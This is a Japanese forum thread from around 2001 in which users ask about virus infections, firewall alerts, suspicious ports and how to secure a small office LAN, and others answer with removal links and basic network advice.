トレンドマイクロ社のNimdaA〜E、Code Red1,2、BADTRANS.Bの
単体でのチェックツールも試してみましたが
何も検出されませんでした。
またExplorer.exeの状態は場所はC:\WINDOWS以下で
ver.4.72.3110.1です。

ある掲示板で
「HTMLメールとCCメールを送ったら相手が怒った。そんなことで
怒るなよ」的な書き込みに対して

「私もつい先日まで知りませんでしたよ、そのＨＴＭＬメールが
なんちゃらっていう話。ついでに言えば、私の職場の上司なんて、知っていても直してませんよ。
「面倒くせえ」だそうです。

あ、ちなみに、私の職業はＳＥです。その「面倒くせえ」の上司は、パソコンを
使ってソフトの開発をしている人物で、いわば、その道のプロです。

ＨＴＭＬ形式の方が好きだし、そうでなくともウイルスなんてウヨウヨ
新しくでてくるんだからさあー、振り回されるよりも、データのセーブ
をこまめにやってた方がいいよ・・・・だそうです。

ウイルスが怖いのはだれしも一緒ですけど・・・振り回されすぎもどうでしょうねえ。
このスレッドには、ずいぶんと振り回されているヒトが多いように
見受けられますが。

ましてや、「知らない」ことをこんなにバカにするヒトがいるなんて・・
驚きですなあ。」

というレスが付いた。
どっちがﾄﾞｷｭｿ？

>>130
ZoneAlarmのスレ見てみるべし。
時間がないなら、日本語化パッチを出しているサイトへのリンクが
始めの方にあるから、そこだけでも読んでおくといいよ。
いろんな場合があるてのは分かるから。

レスつけたヤツは間違いなくﾄﾞｷｭｿ。
「面倒くせえ」の上司は判っててやってる節があるな。
ただHTMLメールを送ってるんなら問題ありだと思うが。

>>132
自分だけ良かったら、という輩はとりあえずスタンドアローンで
なんかやっててほしいもんだな。

初めて、ウィルスに感染してしまった初心者です。
お恥ずかしい質問ですが、お許し下さい。
ウィルスでは？というメールが来て、自分の感染を知りました。
表示されているのが、stuff.mp3.pifだったので、調べてみて、
Badtransというものだと判断し、駆除のファイルをダウンロードして、
対策を打ってみました。
で、確認のためにオンラインウィルスチェックをしたら、
HAP_HAPTIMEといものに、５０ファイル感染していました。
これは、別のウィルスですよね？
今の私のパソコンには何をすればいいのでしょうか？
本当に初心者で申し訳ありませんが、
海外にいるため、非常に心細いです。
アドバイス、いただければ幸いです。お願いします。

>136
初期化汁

>>136さん
どこをどう初期化するのですか？
教えてちゃんですいません。

>138
ぱそこんをかったときのじょうたいにもどすんだよ
でーたもみんなきえるけどういるすもきえるよ

>138

139さんの言うとおり、初期化するのが確実な駆除になります。

それが嫌だったら
ttp://www.symantec.com/region/jp/sarcj/data/v/vbs.haptime.fix.html
でも見てみることをおすすめします。

>>139さん、ありがとうございます。
では、今のデータはどこかに保存して、初期化すればいいのですね。
とはいったものの、一人でやりこなせるのか不安です。
でも、人に迷惑をかけてはいけないので、やってみます。
パソコンを開けると、 メモリ不足のため。。。というのが
頻発するのですが、これもウィルスのせいなのですか？
教えてください。宜しくお願いします。

>>76

すごい遅レスだけど、私W95でIE5.5SP2ちゃんと動くよー
パソコン注文する時点でメモリ120以上入れてもらったりしたからかも
しれないけど。

思ったんですが、今回の件で意外とウイルス対策してない、というか
パソコンのこと自体わかってない人多いのねーと思った。
２年もネットやってて「ウイルス対策のソフトってどんなのあるの？」
ていう人いたの。ひどい人では「インストール」の方法も知らない！
IEのアップグレードが無料で出来ることも知らない！
（有料だと思ってたから何もしなかったんだって・・・）

NIMDAの時点で
「もう危ないサイトに行かなければ大丈夫、なんて全然通用しなくなったな」
と思ったのに・・・なんでこんなにみんな危機感ないのかとても不思議だった。

>>143
>「もう危ないサイトに行かなければ大丈夫、なんて全然通用しなくなったな」

セキュリティーパッチをこまめにあててあれば、今でも「大丈夫」でしょ？

>144
ああ、うん。そうです。すんません。
「危ないサイトに行ってないから、ウイルスなんて縁はない」
とでも言い直します・・・
何もしなくても大丈夫、と思ってる人のことを言ったつもりでして・・・

1 ■『ドリームキャスト』ゲームでウイルスに感染 ■
<http://www.hotwired.co.jp/news/news/20011204301.html>
クールキッズが発売した、セガ『ドリームキャスト』専用RPGゲー
ムのCD-ROMが、ウイルス『W32/Kriz』に感染していることがわかっ
た。このウイルスは、12月25日になると、感染したコンピュー
ターのシステムBIOSを破壊し起動できなくするという非常に破壊
力の強いウイルスだ。

こちらから逝け
http://www.hotwired.co.jp/news/news/Technology/story/20011204301.html

でも、確かに多いですよね。「何もしなくても、私は変なＨＰにいかないからウィルスとは無縁なのだ」と思っている人。
だから、何かの縁でFirewallでも、いれようものなら、「○○（IP）から、不正アクセスがある。どうしよう」とか、
ひどい人になると、プロバイダからのIP取得のすら、「なんかしつこいハッカーがいるんですけど、どうしたらし返しできるんですか？」とか聞いてくる。

あのな、自分で何も学ばずに何を言うとるんや。お前。て、感じだ。

>>144
いわゆる「ブラクラ」は防げない可能性があるよ。
NT系なら平気だろうけど。

質問です。
30台ぐらいのPCをLANでつないでる中小企業の場合、
どの程度のセキュリティーをすればいいでしょうか。

今現在は以下のようなお粗末過ぎる状況です。

インターネット＝＝ISDNルーター＝＝社内LAN

メールサーバーなどのサーバーは動かしてないです。（触れる人居ないし）
ファイアーウォールは設置してません。
アンチウイルスソフトは、インストールしてあったりしてなかったり、
期限切れになってたりです。（情けない。。）

どなたかお返事ください。。

>>150
今すぐテムプスタッフに電話しなさい。
オージンジ・オージンジで良いです。

なんか今日ZAの警告なりっぱなしダヨ・・・これかいてる間にも５回も。
８月のCODE RED騒ぎの時にも凄かったけど、その時と同じくらいきてるよ・・。
・・・ってまた不正アクセスが。

>>150
何をするかが分からない以上、30台に見合ったセキュリティーを施せとしか。
ただ、ルーターの真下に30本ぶら下げるのはどうかと。

>>150
全てのPCに>>3-4のリンクにある
ZoneAlram(ゾーンアラーム)と
AntiVir(アンチウィルス？)　　（２つ共　無料）
を入れてみたら　どうでしょうか？
今の無防備な状態よりはいいと思います

リンク更新

マカフィーってだめなの！PART2
http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

みなさまお返事どうもです。

>151さん
「テムプスタッフ」は検索しても見つかりませんでした。
「オージンジ・オージンジ」は人材派遣会社のことかな。http://www.staffservice.co.jp/

人を呼べってことでしょうか？
でもたかただか80人程度しか社員のない会社で、
セキュリティー専門の人を常駐させるのはお金がかかりすぎる気が。。

>152さん
主にエクセルで作ったデータを各部署で閲覧＆更新しています。
ほかは特になし。
会社にとって大事なファイルは、
一つのPCの中に置くようにしています。
ホームページは、外のレンタルサーバに置いています。
メルアドの数は、ホームページで公開している注文受付用の
１つのみだと思います。

>ただ、ルーターの真下に30本ぶら下げるのはどうかと。
たとえば何を間にかませばいいんでしょうか。

>154
その無料ソフトも使えそうにない人が多いので、
別の方法がいいです。。
（私も毎日出勤している訳じゃないですし）

>>150の今の状況の続きになりますが、
うちの会社、データのバックアップもとってないそうです。(-_-;)

>>133
竜の情報館で仕様内の動作であることはわかりました。
ありがとうございます。
ただなんでExplorer.exeが外部に接続する必要性があるのかは
未だに謎のままなのですが　鬱
自分で多少調べようとしたのですがExplorer.exeで
検索かけるとCode Red�Uの情報ばかり引っ掛かってきて
実際にExplorer.exeが何をやってるかって情報とか
見つからないんですよね　鬱鬱
でもとりあえず安心できました。
改めてありがとうございました。

150の会社は
サイバーテロ組織と認定されました（ｗ

>158
いやーん。(;_;)
でもほんとにヤバイですよね。
インターネットからのファイルのダウンロードがやけに遅いんですが、
トロイやスパイウェアを仕込まれてたらどうしよう。。
誰かに足場にされてる可能性もありますよね。。

>>154
この場合、個人使用じゃないから無料じゃないと思われ。

>>154さん
紹介してくださった無料ソフトですが、
スレや紹介しているページを読んでると評判がいいようなので、
とりあえず私のPCに入れて、操作がわかり次第、
私が働いてる部署にあるPCに入れてみたいと思います。
ご紹介ありがとうございました。

>>156
＞主にエクセルで作ったデータを各部署で閲覧＆更新しています。
＞一つのPCの中に置くようにしています。
LAN上に鯖が無いということはメディアはフロッピー？なぜLANがあるのだ・・・。
＞ホームページは、外のレンタルサーバに置いています。
＞メルアドの数は、ホームページで公開している注文受付用の
＞１つのみだと思います。
HPの管理は外部で作るのは内側？メールは30台とも使うの？

あちこち見て使う気になったところに上のレスが。。
無料のはTinyしか使ったことはないですが、
他のも個人使用じゃない場合は無料で使えないんですね。。

１台か２台だけ
WANにつなぐ　というのは？

あとはLAN

>152さん
> LAN上に鯖が無いということはメディアはフロッピー？なぜLANがあるのだ・・・。

フロッピーとMOがあります。（MOはほとんど使ってないですが）
LANはただつないで、ファイルの回し読み＆書きをしてるだけみたいです。
で、あちこちのPCにファイルが分散してると探すのが面倒なので、
１つのPCの中にファイルを入れるようにしてるみたいです。

> HPの管理は外部で作るのは内側？メールは30台とも使うの？

HPは内部で作ってFTPであげてます。
メールを送受信するPCは会社としては１台だけでいいんですが、
個人でメルアドとって送受信してる人はいます。

>164さん
WANって言葉、はじめて見ました。
調べてみます。
今日はもうすぐ寝ちゃうので、
レスは明日(今日?)の夕方以降になります。

ZoneAlarmのログを見てると、http（port80）とport6699の２つのポートへの
アクセスが目に付きます。前者はおそらくcoderedを始めとする一連のウィルスだと
思いますが、6699って何なんですか？
6699については、経験的に1〜数人が何度もしつこく突っついてくる感じです。
port 6699で検索かけたところ、どうやらNapster関連らしいのですが。
非ユーザーのPC（私はNapster系は一切使いません）に何度もアクセス
するのって何か意味があるんでしょうか？

>>165
フィルタ無しで、各端末HD共有してるって、、、
タチ悪いウイルス1発混入するだけで最低1日は業務止まりそう。。。
WAN側だけ神経尖らせても不安一杯。
個人で外部にメーラー接続許してるし。。←恐らく、業務上コレの禁
止は現状だと無理でしょうし。。。
パートさん、大変だよぅ〜〜。
>>166
MXｯﾃ､､ｼｯﾃﾙ??

よくIEやOEでウイルスに感染したってカキコに対して
MS製品使うのやめろってレスが付くが
セキュリティ意識がしっかりしていて
対策を採っている人間なら
いくらMS製品使っても感染せんし、
逆にセキュリティ意識が低くて
何も対策してない人間は
何を使ってても感染すると思うのは俺だけか？

>>168
漏れも同意。。
でも、セキュリティ意識しっかりしてるならMSなんか使わん
というあをりが、ココ板だとこの後来る（泣

ramenや1i0nだって、出たとき大騒ぎしたぢゃ無いか！！

セキュリティ意識しっかりしてるならMSなんか使わん。
漏れ、セキュ意識しっかりしてないからMS使うけど。

ところで年末・年始に向けてIIS専用ウイルスもう１発来そうな予感。

>>159
クソヲタがROMやMP3をﾀﾞｳｿしてるんじゃないのか？（ｗ
どういうネットワーク構成だか知らないけど、スイッチングHUBで
適当に分けたほうがいいような。

つか、某社のパート氏が
どれだけの権限を持ってるか知らないが、
・管理者の設置
・運用規定の作成
・教育の徹底
このへんをやらなくちゃならないと思うのだが
すでにパートの仕事じゃないです（ｗ
お金が出ないんだったら
あまりかかわりあいにならないほうがいいような…

>>170

winXPのPC→そういえばNT系→IIS・・・。→
→祭り開催→あぼーん

笑えない・・・。

>>165
LAN内にhostが1つでファイル共有してるわけだな（鯖立ってんじゃん）。
ファイルの回し読み&書きと言うことは・・・
もしや、内部の人間なら誰でもどのファイルでも消せる（盗める！）？
まさかログインパス無しとか・・・ありそう（汗）。
分散しないように1台にまとめてるのか、かなりバックアップは楽だと思うが
（Winなら1回のDnDで済むじゃん）。

かなり暗黙の了解でNetworkが成り立っているような・・・。

>>167
MXも6699を使うんですか？
でも
「非ユーザーのPC（私はMXも一切使いません）に何度もアクセス
するのって何か意味があるんでしょうか？」
という疑問は残ります…

>>174
IP総なめされたんじゃないの？あんま深く考えなくても良いと思うけど。

昔そのIPを使ってたヤツが
MXを動かしてたとか。

>>174
多分前にMX使ってた人のIP貰っただけだよ。
俺もたまにある。

IPｽﾌﾟｰﾌｨﾝｸﾞ対策としてﾙｰﾀがﾌﾟﾗｲﾍﾞｰﾄIPを通さないように設定したいんだけど
その場合遮断するのは10.0.0.0/8　172.16.0.0/12　192.168.0.0/16でｲｲの？
最後の/??の意味がいまいちわかんなくって...

>178 netmaskで検索

下らない質問です。
ウチの会社では
「ＩＥは危ないからネスケにしよう」
「OutLookは危ないからネスケにしよう」
と盛り上がってます。
実はネスケってメーラもあるのかどーかも知らない自分、ドキュソですが
「ネスケだから安全だね」
という考え方は安直な気がします。
どんなもんでしょう？

>>180
セキュリティ意識の低い奴は何使おうがやられる。

って同僚の人に言ってみて（w

>>180
>>181さんの発言に続けて、
「普段使っているソフトを変えると、ただでさえ遅い仕事が更に遅くなるかも。
なれれば良いんですけど、大丈夫ですか？」とも言ってみそ（ｗ

>>180の同僚みたいな奴が例の騒ぎの時、バックグラウンドでIIS立ててたりしたんだろう・・・

ZoneAlarmやSygatePFはアプリの方向の許可の設定が出来ないから
敬遠される方も多いらしいですが、インバウンド接続が可能だと
具体的にどんな危険があるんでしょうか。

例えばブラウザやメーラーをインバウンド接続可能に設定しておくと
どんな危険があるでしょうか。

>>184
つまり、ブラウザとメーラー、常駐で起動させてるんだね。君は。
んで、そのメーラーはMTAとしても機能する訳だ。
・・・・うっ、手動で転送すれば結局MTAなのか。。。

上級者の人に質問があります。

黒氷やらゾーンアラームやら色々と試してみたけど、結局は
ゴミパケットしか飛んでこない。深刻な不正アクセスは皆無
に近い。アングラサイトには行かないし、WinMXも使って
ないから長時間繋ぎっぱなしにすることもほとんどない。
あと、クレジットカードも使ってないし、見られたり盗まれたり
して困るものも一切入ってない。
・・・とまあこんな状況なので、システムを軽くしたいがために
一切のファイヤーウォールを入れないことにした。
果たしてこの選択は愚かなのだろうか？というより、俺と同じような
選択をしている人はいるのだろうか？
かなり頻繁にトロイチェック、ウィルスチェック、ADawareでスパイウェア
チェックをやってるが、一度も引っかかったことがないし、あと
キャッシュクリーンも定期的にしてる（クッキーは初めからOFF）。

なんでもいいのでご意見くれるとありがたいです。

>>185
常駐で起動ではないですが、ブラウザは起動させてることが多いです。
その時ブラウザのインバウンド接続を可能にしていると
危険でしょうか？

>>187
危険だと思えば切ってみれば良い。
あれ？と思ったら色々調べてみれば良い。

そのブラウザって、httpサーバーとしても機能するの？

>>175-177
なるほど…レスどうもでした。

SpyAgent's AMAZING Features:

今日２通も来たんだけどなにこれ？
今まで見覚えの無いスパム？とか広告メール来た事無いのに････

どなたか教えて下さい。
ネットで検索などする時、「インターネットへ情報を送信するときに、
その情報をほかの人から読み取られる可能性があります。」と出てくるんですが、
これって、ウィルスの影響ですか？

>>191
放置。

>>188
＞そのブラウザって、httpサーバーとしても機能するの？

機能しません。
でもTinyスレの設定例でも、ブラウザの
インバウンド接続は許可してないみたいなので。
まあ自分で調べてみるか。

＞＞192
とゆーことは、「今後、このメッセージを表示しない」にすれば良い
のですか？
何度もすみません

「はがきを郵便ポストに入れると配達員に読まれるかもしれません」
ってのと同じ。

安心しました。
ありがとうです。

ちょっと質問なんですけどーーーーー
Re: 2001N3?I±＼
ってタイトルのメールが届いてます。
前にダイエット食品のサンプルを送ってもらった会社から来てるんですけど、
ウイルスっぽいような気がしてこわくて開けないんですけど、やっぱりウイルスでしょうか？
内容が気になっても削除した方がいいんでしょうか？
ちなみにWEBのフリーメールです。

webpdp_fsg_1050.exeってのがWin起動時に接続しようとするんですけど
こいつはいったい何なんでしょうか・・・
おわかりの方お願いします。

>>198
その名前で自分のPC内検索してプロパティ見ろよ、頭わりぃな

こんちわ。今日はパートお休みです。
私の日本語が変でうまく伝わってなかったので、
もう一度状況をまとめます。

インターネット＝＝ISDNルーター＝＝社内LAN（WindowsPC30台ぐらい）

・メールサーバーなどのサーバーは動かしてない。
・ファイアーウォールは設置してません。
・アンチウイルスソフトは、インストールしてあったりしてなかったり、
　 期限切れになってたりです。
・重要なファイルは１つのPC（たぶん普通のwindowsPC）に置いて、
　 それぞれの部署が読み込み＆更新できるようにしています。
　 （１つのファイルをA部とB部が更新したりする。）
・そのファイル置き場になっているPCのデータのバックアップは
　 ときどきしてるらしいです。（きのう知った）他のPCはしてないです。
・ネットワークログインのパスワードは設定してなくて、
　 ほかのPCのフォルダは丸見えだったような。
・メールの送受信するPCは会社としては１台でいい。
・インターネットへの接続は3台程度でいいと思う。
・社内LANは本社の建物のPCと50Mほど離れた所にある某部署の建物の
　 PCに繋がっている。
・プリンタを共有している。

●最近知ったこと。
ファイアーウォールを設置する場合、非武装地帯というのをつくるらしい。

●まだわからないこと。
「WAN」
「普通のwindowsのパソコンでもファイル置き場として使ったら『サーバ』というのか」

お返事くださった方々感謝です。
会社のためというより、個人的に興味があるので、
ちょっと自分で雑誌や本を読んで調べてみます。
またなにか質問や進展があれば書きこみます。

>>164さん
> １台か２台だけ
> WANにつなぐ　というのは？

PC数台だけインターネットにつないで、
他はつながないということでしょうか。
これは簡単かもしれない。
で、ウイルスソフトを全部のPCに入れて、
ネットワークのパスワードもせっていすると。
プリンタの共有はどうしよう。

BadaTransスレッドより

595 名前：くそDION ：01/12/07 14:05
このウイルスさDIONから届いた奴おるか？


596 名前：くそDION ：01/12/07 14:09
DIONに問い合わせたらさ何にも対応してくれんかったわ。
そのかわり、ええこと聞いたで！
加入者しか使われへんSMTPサーバさ、加入者以外でも使えるみたいやで。
で、結果そのSMTPサーバ使ってウイルス送られてるみたいや！

DIONなんとかせえや！


597 名前：名無しさん＠お腹いっぱい。 ：01/12/07 14:17
57通8通がDIONでしたが何か？
うち3人は警告メールにちゃんと謝罪・報告してきたし。
最悪はOCNで、12通あり返事ゼロ。
あとはbiglobe6通でこれも返事ゼロ。
プロバイダに文句いってみたことはないので、
そこらの具合は知らない。


598 名前：名無しさん＠お腹いっぱい。 ：01/12/07 14:18
>>596
説明の聞き間違いじゃないの？


600 名前：くそDION ：01/12/07 14:22
>>598

あら、、DIONの方ね（ｗ


601 名前：名無しさん＠お腹いっぱい。 ：01/12/07 14:37
>>600
少なくともこのウィルスに関しては故意にばらまいてるから
広まってる訳じゃないだろう？


602 名前：名無しさん＠お腹いっぱい。 ：01/12/07 15:07
「加入者以外でも使える」とかいう表現が疑問なんだよね。
まあ、プロバイダが○○すべし、とかいうのはちょっと前にも
議論があったところだし、あんまりこのスレでやるのもなあ。
やるんだったら雑談スレにでもいってやろうぜ。

上記の話題をわざわざ持ってきたのは、ちょっと思い出したことがあったからで。
Hi-Hoネットから（いまごろ）ウイルスにご注意メールがきていて、
その中にHi-Hoから、
「お客様がどこそこに送ったメールにはウイルスが」
とかなんとかいうようなメールを送ることがあるぞ、てなことが
書かれていたもんで。
他になんか対応措置やっているプロバイダあるんだろうか。
俺は実は57通もらったやつで、なるべくならOCNが
なんかやってくれたらなあ、とちょっと思ったもんだったけど。
（もらった中にはHi-HOからのはなかったなあ。）

>>203
送信で引っかかったのか、受信時に引っかかったのかの区別を激しくｷﾎﾞｰﾝ。
ただ、その問題より、「「加入者以外でも使える」とかいう表現が疑問なんだよね。」
の部分に共感。SMTPには元来認証プロセスが無いことをご存知なのだろうか。

> 送信で引っかかったのか、受信時に引っかかったのかの区別を

ごめんなさい、ちょっと意味がわからんもんで。
・Hi-Hoからのメール
　どういうチェックをするとか、しているとかは書かれておらず、
　当方（Hi-Ho）からあんた（お客様）にそういう通知のメールを
　送ることがあるぞ、とあったのみ。
・俺がもらったメール
　送信者のアドレスより、使用プロバイダを数えた。

なんか質問の趣旨をとりちがえているようなきもするなあ。
ちょっと移動するので、次6時過ぎになります。

6時前だけど。
まずは、Hi-Hoから送られたメールは、ご注意下さいてなことが書かれて、
でもってトレンドマイクロとかのURLがあってその後、
−−−−−−ここから引用−−−−−−
また、弊社（[email protected]）より
下記のようなメールを受け取られた場合、
お使いのコンピュータが該当ウイルスに感染されていると
思われますので、この場合にも上記URLをご参照の上、
駆除など対策をお願いいたします。

あなたが○○○さんに送ったメール(添付ファイル:×××)
がウィルスに感染していました.

　※ここで、○○○、×××は、
　　○○○：送信先メールアドレス
　　×××：添付ファイル名
　　で、感染したウイルス、場合により異なります。
　　文章も場合により多少異なる場合があります。
−−−−−−ここから引用−−−−−−
というもの。
どうやら、会員AがBに送ったメールがやられており、
BがAでなくHi-Hoに文句を言っていった場合には、
Hi-HoがAにこういうメールを送るってことではないかなあ。

Hi-Hoのサイトの情報では、有料のメールチェックサービス
（会員が受信時のみ。送信は対象外）について書かれていただけ。

忘れていたけど、
> SMTPには元来認証プロセスが無いことをご存知なのだろうか。
だから、POPを先にさせるプロバイダとか、
自分のところのアクセスポイントにつないでいないと送信させない
プロバイダとかがあるんだよねえ。
ついでに、こういう場合にもOEは面倒なのだなあ。。。

>>200某社のパートさん
インターネット＝＝ISDNルーター＝＝社内LAN
ISDNルーターに直接社内LANのPC30台ほどが繋がってるの？
　間にHUB挟んであるよね？
本社の建物のPCと某部署の建物のPCと社内LANの接続方法は？
　HUBのカスケード？他？
プリンタ、ファイルの共有がどの範囲まで？
　社内LANだけ？ルーターより内側？

DMZ（非武装地帯）は外部にサービス提供しないなら必要ないよ？
WANとサーバはここ読んで。
http://www.atmarkit.co.jp/icd/root/80/5786880.html
http://www.atmarkit.co.jp/icd/root/93/5786793.html

>>200
資格板のネットワーク試験スレでｺｿｰﾘ相談すると
只で色々考えてくれそうな気がした（ｗ

テクニカルエンジニア【ネットワーク】3
http://ton.2ch.net/test/read.cgi/lic/1004020696/

>>206
なるほど、片側のチェックのようですね。一般的には、
件名：「Subject: Virus Alert」
内容：「Have detected a virus (WORM_BADTRANS.B) in your mail traffic on 12/01/
2001 10:00:10 with an action delete.」
若しくはこれを和文にしたものが多いのです。
「traffic」と単に書かれていて、送信したものなのか、受信したものかが
明確でなく、自分自身が感染しているのかどうかもわからなくなってしまう
ものが多いのです。少なくともチェックしてくれて、かつ、その内容を
伝えるのであるとすれば、もうちょっと明確である必要があるように思った
までです。

私がAさんからもらったメールの添付ファイル（画像）を
、Bさんに「送って欲しい」といわれたので、
そのファイルをダウンロードしてBさんへ
添付して送ったんです。そうしたら、なぜか
Bさんにウィルスが感染してしまったようです。
私は故意にそのようなことをしたわけでは
ないのですが、Bさんは私が故意にウィルスを
送りつけたのではないかと疑っていて、私を訴える気でいるようです。
なぜBさんにウィルスなどが感染してしまった
のでしょうか？？わけがわかりません。
このようなことで訴訟問題にまで発展した事例は、あるのでしょうか？？
私はどうなるのでしょうか？？すごく怖いです。

>>210　とBはどういう間柄？
何にせよBはﾄﾞｷｭｿであり訴訟云々はﾊｯﾀﾘの可能性高し
一段落ついたら早いうちに手を切ることをおすすめする。

マルチ

>>211
Bさんとは全く面識がありません。
ネットの掲示板上でやりとりをしていただけなんです・・・。
相手は、私のプロバイダにも苦情のメールを出したようです。
「故意ではない」と何度も主張しているのに、
「悪質だ」とか「こいつは嘘つきだ」などと言われました。

ああ、なるほど、なんとか趣旨がわかったような。

> あなたが○○○さんに送ったメール(添付ファイル:×××)
> がウィルスに感染していました.

ならまあ許容範囲ですね。

IEのお気に入りフィルダをそのまま使えるブラウザはあるけど、
OEのフォルダをそのまま使えるメーラーってある？

>>215
たいていはインポート機能とか、変換ツールとかあって、
フォルダ構成とかも移してくれるけど。
俺の体験でいうと、shurikenで変換ツール使うと
フォルダ構成そのままに移してくれたよ。

>>216
レスさんくす。
出来れば同時にフィルダを共有したいんですよ。
OEのフォルダのバックアップ機能がPCについてるんで。

ＢＡＤ〜じゃないようなのでこちらに引越しました。
すみませんがお世話になります。

●本日夕方に友人から、｢ＲＥメール｣がきました。
添付ファイルなし、ですがあやしいのでソッコー
削除しようとしたところ、移動のみ（いやポインタをあわせただけのような？）
なのにないはずの添付ファイルを開けてしまい、２ファイル感染してしまいました。
とりあえず友人には電話連絡しました。(←まったく対策なしの人）
またもう遅かったのですが、ＯＵＴＬＯＯＫのパッチ済。

●いろんな問題が！●
マカフィーＶＳＯが使用不可になりました。
感染した２ファイルは駆除できず、削除しましたが、
どうも削除できていない様子。アンインストも不可です。
シマンテックのＷＥＢ上でチェックすると
｢ＷＩＮのテンポラリーインターネットファイルの××ファイルが
次のウィルスに感染しています｣、と出ます。
それが｢Ｍacro.src｣で、検索かけてもウィルス辞典等にないんです。

Ｂａｄ〜でもＧＯＮＥＲ（Ｈｉメールじゃなかった）でもないようなので、今解析依頼
を出そうとしましたが、自分ではエクスプローラ上でファイルを見つけられなかったので、
削除？＆解析依頼のメールすら出せません。こんなへぼい私ですが、
なんとか自力削除を試み中なのでお力を貸していただけないでしょうか？
お願い致します。＜ＡＬＬ

いままで使っていたMcAfeeウイルスシールドの使用期限が切れてしまったのでアンチウイルスソフトを買おうと思うのですが
ノートンとウイルスバスターのどちらがいいでしょうか？

ノートンでウィルスチェックをして感染していなかったのに、
ウィルスバスターオンラインスキャンをしてみたら感染がみつかりました。
逆ならまだわかるのですが、こういうことはあるのでしょうか。

みつかったウイルスはノートンで１１月にチェック、削除したものでした
（２種類）。オンラインスキャンに表示されたファイルは検索してみましたが
存在していませんでした。また１１月にチェックしたときはファイル数は４つ
でしたが、オンラインスキャンではファイル数５と出ました。もちろん最新の
パターンでノートンで再チェックしましたが、感染ファイルはありませんでした。

WindowsＭＥ、ＩＥ5.5SP、ＯＥは使っていません。

ノートンで見つからずバスターで見つかることもある。
その逆のこともある。
気にするほどのことでは無い。

共有というのは難しいと思う。
ただ、インポートとかしておいて、かつ一方のメーラーについては
メールをサーバに残しておく設定にして、
もう一方のメーラーでサーバーのデータを削除するようにすれば、
結果的にはOKと思う。ダウンロード時間もったいないけどね。

あとバックアップだけが問題なら、多くのメーラーソフトは
OEよりバックアップ容易だよ。
疑問をお持ちの点にズバリではないかもしれんけど、
結構よくできている比較
ttp://www.emaillab.org/win-mailer/

今日、あるマシン（旧時代のSunOS2.3）にnessus かけてみたら
32774にhttpdが立っていたらしい。らしい、というのは担当者があわてて
Rebootしてしまったためで、今となっては確かめようが無い。
もちろん、誰もポート32774にhttpdたてた覚えは無いという。
ＲＰＣはよくわからないのだけどこれって、やられてるのでしょうか？

>>218の状態からなんとか無事抜け出せました。
結果的に２すれにカキコしてマルチポストみたいになってしまい、
ウザイ奴で申し訳ありませんでした。

>>221
＞ノートンで見つからずバスターで見つかることもある。

それはわかっているのですが、私のレスの後半も見て
いただきたいのですが・・・

Macro.src
結局これって何なのよ。

>>220
>オンラインスキャンに表示されたファイルは検索してみましたが
>存在していませんでした。
どのフォルダで検出されたの？

>>227
C: RESTORE\ARCHIV　　（略）
すみません。はっきり覚えていないんですが、そういうフォルダ自体が
存在しませんでした。

ADSLです
これまでネットワーククライアントを削除、TCP/IPとnetBIOSのバインドはずしていました。
新たにIPXプロトコルをインストールしようと思いますが、注意する点はありますか？

>>228
Meの復元フォルダというやつかな。Meは使ったことないのでわからないのだが
_restore
*restore
で「ファイルやフォルダ検索」してもそのフォルダは出てこないの？

Hybrisってプレビューでも感染する？

Hybrisは純粋な添付型じゃなかったっけ？亜種とかだと分からんが。

>>230
*restore で検索してみたらrestoreフォルダはwindowsのsystemの中に
ありました。でも、それらしきファイルは見当たりません。もう一回
オンラインスキャンして、完全なファイル名を見てみます。

>>231
ちなみに、ひとつはＨｙｂｒｉｓでした。
添付ファイルは開いていませんが、ノートンで
チェックしたら「感染」してました。

＞220
参考になるかな？
http://www.zdnet.co.jp/help/tips/windows/w0345.html

>>235
リンク見てきました。たぶんこれだと思います。
本当に助かりました。ありがとうございました。

TROJ-SUB7.MUFE何とかて言うウイルスにかかったんですが、
ウイルスは駆除したんですが、windows-とか言う常駐ソフトがどうしても
外れないんです。
かなりメモリーくうみたいで、ＰＣが遅くて困ってます、だれかはずしかた教えてください

>>237
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2EA
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2EB
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2ED

>２３８
ありがとうございます。
しかしレジストリいじる技量が自分にないのが残念です。

0 TIME_WAIT
TCP oemcomputer:4066 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4067 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4068 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4069 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4074 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4075 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4081 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4088 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4089 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT

最近やたらこれがでます。なにか問題ありそうですか？

質問です。お願いします。
いつもは１Mbps でてたADSLが今日、
FW（XPに入っている奴）とAV（ノートン）を入れたら
300〜600くらいしか出なくなりました。
これはプロバイダに文句言ってよろしいでしょうか？
ちなみに契約は８Mなんです（泣

>>241
FWとAV入れて遅くなったのにプロバに文句を言うのは御門違い。
そもそもスループットがフルレートで出るなんて誰も保障してないはずだが。

「BadtranceとGONEのウィルスつきのメール送ってやります」
という脅迫メールが頻繁にくる場合、どうしたらいい？
私のところに来たわけじゃないんで詳しいことはわからんのだけど。
ヘッダ見たのか知らないけど、そのメールを返信しても届かなくて帰って来ちゃうらしい。

>>243
虫

>>243
IPから調べてISPに通報

プロバに苦情言ってそのメールが止まればいいけどね…。

>>246
止まらなくても実害無い、ご丁寧に送られてくるウィルスの種類まで教えてくれてるのだから
ウィルス対策しておけば問題なし。後は無視

>>246
メーラーの設定で
受信→ごみ箱でどうよ？

すみません。
ポート5000の(Sokets de Trois v1.)は何に使われますか？
ウイルスに感染したコンピュータからのアタックかなぁ〜。

>>249
Sokets de Troisというトロイの木馬が使ってますね。＜ポート5000
